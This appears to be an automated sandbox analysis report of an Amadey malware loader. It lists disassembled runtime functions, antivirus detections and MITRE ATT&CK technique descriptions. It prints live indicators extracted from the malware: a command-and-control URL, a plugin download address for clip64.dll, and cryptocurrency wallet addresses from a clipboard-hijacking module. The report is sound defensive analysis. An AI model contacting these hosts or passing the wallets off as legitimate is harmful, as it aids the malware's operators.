Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: f9f470634acf3721eb90ab792a4983ea1fb09aa3706137a829ad8c5b0368011d
Instruction ID: 4baf583c58d0e08bac4262af785b73fdb85e9b738ca56a342132be70e16327b7
Opcode Fuzzy Hash: f9f470634acf3721eb90ab792a4983ea1fb09aa3706137a829ad8c5b0368011d
Instruction Fuzzy Hash: 33512971D142189BEB24EF68CD487DDBB7DEB55318F5082A8E409A7385EB345A808B91

Uniqueness

Uniqueness Score: -1.00%

Function 01384FCE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0138509E
_free.LIBCMT ref: 013850C7
SetEndOfFile.KERNEL32(00000000,013825FD,00000000,0137D4F0,?,?,?,?,?,?,?,013825FD,0137D4F0,00000000), ref: 013850F9
GetLastError.KERNEL32(?,?,?,?,?,?,?,013825FD,0137D4F0,00000000,?,?,?,?,00000000), ref: 01385115

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 4c4ed08f178d5ddbfd2debffb6504093afefd7ddf5efedfcb69e5a287bd908f6
Instruction ID: 0aab032f5f97a3cda7b2607bd36a742c945aa599a2723b86be8489df4c371ef6
Opcode Fuzzy Hash: 4c4ed08f178d5ddbfd2debffb6504093afefd7ddf5efedfcb69e5a287bd908f6
Instruction Fuzzy Hash: 97412DB29003469BDB22BFBCCC40B9E7BB9EF54378F280510F925E7291E634C84247A1

Uniqueness

Uniqueness Score: -1.00%

Function 0137F99A Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0137AE0F: _free.LIBCMT ref: 0137AE1D

Part of subcall function 01380971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01384B40,?,00000000,00000000), ref: 01380A13

GetLastError.KERNEL32 ref: 0137FA02
__dosmaperr.LIBCMT ref: 0137FA09
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0137FA48
__dosmaperr.LIBCMT ref: 0137FA4F

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 584124a64d68225fc5bb016a05cf1046d2fa0793f7710ff3cfb020df065bd735
Instruction ID: 0f27f0ed46f2561467716d14c2abe6f94a331821a54deff12d3a2d05e77bb22c
Opcode Fuzzy Hash: 584124a64d68225fc5bb016a05cf1046d2fa0793f7710ff3cfb020df065bd735
Instruction Fuzzy Hash: 9F21867260420ABFEB31BF7D888096BB7ADFF0526C7144515F93997651EB38ED008B91

Uniqueness

Uniqueness Score: -1.00%

Function 0137DF44 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0137AD8D,00000000,?,?,?,0137AF26,?), ref: 0137DF49
_free.LIBCMT ref: 0137DFA6
_free.LIBCMT ref: 0137DFDC
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0137AF26,?), ref: 0137DFE7

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: ad192d2fc295efd748d2ddd32e299c7ccce1dd4501a793dfe66375c97a2eed91
Instruction ID: e5a7d4241e8824616325a1df9825f4c20a47f79b7ba33fa1f167e2d9afc2ae18
Opcode Fuzzy Hash: ad192d2fc295efd748d2ddd32e299c7ccce1dd4501a793dfe66375c97a2eed91
Instruction Fuzzy Hash: 6A11A9722095162AD6313BFD9C84E2B25AE9FD277CB240279F229972D0DE3D8C454210

Uniqueness

Uniqueness Score: -1.00%

Function 0137E09B Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0137B7F5,0137DB7F,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137E0A0
_free.LIBCMT ref: 0137E0FD
_free.LIBCMT ref: 0137E133
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137E13E

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 4e1b75f68602d6ae97b7eca66469c1b05d7a9faffbc1ba1ef6ef52e692e4560a
Instruction ID: 93f1d2aec4b5a4b48ce1a0d15e34ceed3537abff0e8e67692824f55007da537b
Opcode Fuzzy Hash: 4e1b75f68602d6ae97b7eca66469c1b05d7a9faffbc1ba1ef6ef52e692e4560a
Instruction Fuzzy Hash: 4511DB722046266AD7322BBEEC85D6B25EE9BD277CF2502B5F128932E0DE7D8C414310

Uniqueness

Uniqueness Score: -1.00%

Function 0137E87D Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0137E9E2,00000000,?,0138370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0137E893
GetLastError.KERNEL32(?,0138370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0137E9E2,00000000,00000104,?), ref: 0137E89D
__dosmaperr.LIBCMT ref: 0137E8A4

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 9aeb25eebb9314328c116859eb67c9de0b2acb2cbffb8fa0ac7beb3188d6b0a7
Instruction ID: 708d809778ca96d2ef4f79f462d03161da51c09aef89db0e6feda2e82095d14a
Opcode Fuzzy Hash: 9aeb25eebb9314328c116859eb67c9de0b2acb2cbffb8fa0ac7beb3188d6b0a7
Instruction Fuzzy Hash: 42F08132600116BBDB315FAAD80894BFFAEFF546A93044971F529C6510D735E811CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0137E8E6 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0137E9E2,00000000,?,01383695,00000000,00000000,0137E9E2,?,?,00000000,00000000,00000001), ref: 0137E8FC
GetLastError.KERNEL32(?,01383695,00000000,00000000,0137E9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,0137E9E2,00000000,00000104), ref: 0137E906
__dosmaperr.LIBCMT ref: 0137E90D

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 7fa64038ddbc4ad8649a3f83cbc51c7b7cbdc25ff7ef448685a544ae3a75f916
Instruction ID: 601833b2a6c70a65bd84c755ad4e8b623b022497439050e6e63e2682dad3ff88
Opcode Fuzzy Hash: 7fa64038ddbc4ad8649a3f83cbc51c7b7cbdc25ff7ef448685a544ae3a75f916
Instruction Fuzzy Hash: FBF06D3320021ABBDB711BAAC80894BFFADFF462A53044574F518C6510C739E821CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0138638F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(01365140,0000000F,013968F8,00000000,01365140,?,01385AA7,01365140,00000001,01365140,01365140,?,01382ECD,00000000,?,01365140), ref: 013863A6
GetLastError.KERNEL32(?,01385AA7,01365140,00000001,01365140,01365140,?,01382ECD,00000000,?,01365140,00000000,01365140,?,01383421,01365140), ref: 013863B2

Part of subcall function 01386378: CloseHandle.KERNEL32(FFFFFFFE,013863C2,?,01385AA7,01365140,00000001,01365140,01365140,?,01382ECD,00000000,?,01365140,00000000,01365140), ref: 01386388

___initconout.LIBCMT ref: 013863C2

Part of subcall function 0138633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01386369,01385A94,01365140,?,01382ECD,00000000,?,01365140,00000000), ref: 0138634D

WriteConsoleW.KERNEL32(01365140,0000000F,013968F8,00000000,?,01385AA7,01365140,00000001,01365140,01365140,?,01382ECD,00000000,?,01365140,00000000), ref: 013863D7

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 528fd4dba02637a916a7ca7ff1513904d7ff432f9a8c8b8133f628a05e379dec
Instruction ID: 31f7bf4024c890b7ce1ef8a6e379cb19c0fef2e67f2ea5c8951cfe8569556ec7
Opcode Fuzzy Hash: 528fd4dba02637a916a7ca7ff1513904d7ff432f9a8c8b8133f628a05e379dec
Instruction Fuzzy Hash: 29F03076400369BBCF322F99EC05A8E3F6AFB493A5F044420FA1895130D6728920EB91

Uniqueness

Uniqueness Score: -1.00%

Function 013771BA Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,01377157,00000064), ref: 013771DD
LeaveCriticalSection.KERNEL32(01399708,000000FF,?,01377157,00000064,?,?,?,01363E30,0139C468,774AE603,?,00000000,01388818,000000FF), ref: 013771E7
WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,01377157,00000064,?,?,?,01363E30,0139C468,774AE603,?,00000000,01388818,000000FF), ref: 013771F8
EnterCriticalSection.KERNEL32(01399708,?,01377157,00000064,?,?,?,01363E30,0139C468,774AE603,?,00000000,01388818,000000FF), ref: 013771FF

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: eb27392a3b8bf70d6c506edb45f6bcde4a9747b938b205982d1558d394b907d6
Instruction ID: c1a242d182f8c9eb82382057b9891f4f31d37f924b0541cbcab25565615cdb0b
Opcode Fuzzy Hash: eb27392a3b8bf70d6c506edb45f6bcde4a9747b938b205982d1558d394b907d6
Instruction Fuzzy Hash: 43E01235641228ABDF211F51EC09BDD3E5DFB09B6AF020028F50556114CF729900CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0137C8BB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0137C8C4

Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B

_free.LIBCMT ref: 0137C8D7
_free.LIBCMT ref: 0137C8E8
_free.LIBCMT ref: 0137C8F9

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2fdd8ac631d872d0a8e59fddc68fbeea2763aad46e86c1651319c9d53b52ee88
Instruction ID: be5d5e1ba8d879ee39e672971c8a2a5ecb9b8998aac5e3fb06255256540b6bfd
Opcode Fuzzy Hash: 2fdd8ac631d872d0a8e59fddc68fbeea2763aad46e86c1651319c9d53b52ee88
Instruction Fuzzy Hash: 54E0E6714001629ACF316F5AFD0198D3F6DEB94B2CB41414BE52923318EB3B05D5DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0136B5E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 481COMMON

Download Yara Rule

Strings

-, xrefs: 0136BBF6

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: f7a106ac20b3469c9cce9cf40f3ddff02f36fca6da1a9bc411f9e56b26621c95
Instruction ID: 90b256c2f8fc0e1c5bdad9192ca250b9507e3c4cce0910a50a34a9a63037fb09
Opcode Fuzzy Hash: f7a106ac20b3469c9cce9cf40f3ddff02f36fca6da1a9bc411f9e56b26621c95
Instruction Fuzzy Hash: BC2282B0D052599BEF25EB28CD497CDBBB56B6230CF5480E8C44927286DB751F88CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0137BF2A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 0137BF6D, 0137BF74, 0137BFAA

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
API String ID: 0-3702952914
Opcode ID: e69751809c7756236469ddfb7fd6c7bd23c520755ee52b2fd01f79ca33269ffa
Instruction ID: 8adaafa66ff01aac80ef0d941430b4df94c0b9a3dcdf3bf65cc0e7abb2933967
Opcode Fuzzy Hash: e69751809c7756236469ddfb7fd6c7bd23c520755ee52b2fd01f79ca33269ffa
Instruction Fuzzy Hash: 1741A671A0025AAFDB32DF9DDC80E9EBBFCEF95718F10006AE504E7240D6758A44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01378F7D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 01378FA2

Strings

RCC, xrefs: 01378FBC
MOC, xrefs: 01378FB4

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: a0846d687ea765f5557bdcdfa293875d625cc50a05e568409c726014d523b898
Instruction ID: 7899b87a618694b90feedb964676a266c99fd3391bd73cb17f692f61f195bf91
Opcode Fuzzy Hash: a0846d687ea765f5557bdcdfa293875d625cc50a05e568409c726014d523b898
Instruction Fuzzy Hash: 73416A71900209AFDF26DF98DD84EEEBBB6FF48318F184199FA04A7211D3399950DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0137207A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01372093

Strings

5120, xrefs: 013720DA
H, xrefs: 01372146

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: 5120$H
API String ID: 514040917-2391956277
Opcode ID: e0499fbd77cd672dc7a2a3f3a8f64cdd1d38e91cd7739e3bea39beed78697242
Instruction ID: 58d5ac8bf937fcbde5f8549fefc3e784c9d9773825a2e7019e5eb4c5f3d242b9
Opcode Fuzzy Hash: e0499fbd77cd672dc7a2a3f3a8f64cdd1d38e91cd7739e3bea39beed78697242
Instruction Fuzzy Hash: 4B21BDB09003889BDB25EF2CC9467DD7FB8AB02308F5405DCD54967282D7794B498BE3

Uniqueness

Uniqueness Score: -1.00%

Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	Avira URL Cloud: Label: malware
Source: http://62.204.41.4/Gol478Ns/index.php	Avira URL Cloud: Label: malware
Source: 62.204.41.4/Gol478Ns/index.php	Avira URL Cloud: Label: malware

Source: 62.204.41.4/Gol478Ns/index.php	Virustotal: Detection: 12%			Perma Link
Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	Virustotal: Detection: 16%			Perma Link

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	ReversingLabs: Detection: 80%

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Joe Sandbox ML: detected

Source: 19.0.mnolyk.exe.980000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
Source: 22.2.rundll32.exe.6d0c0000.0.unpack	Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,		0_2_00EB2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00942F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,		1_2_00942F1D

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

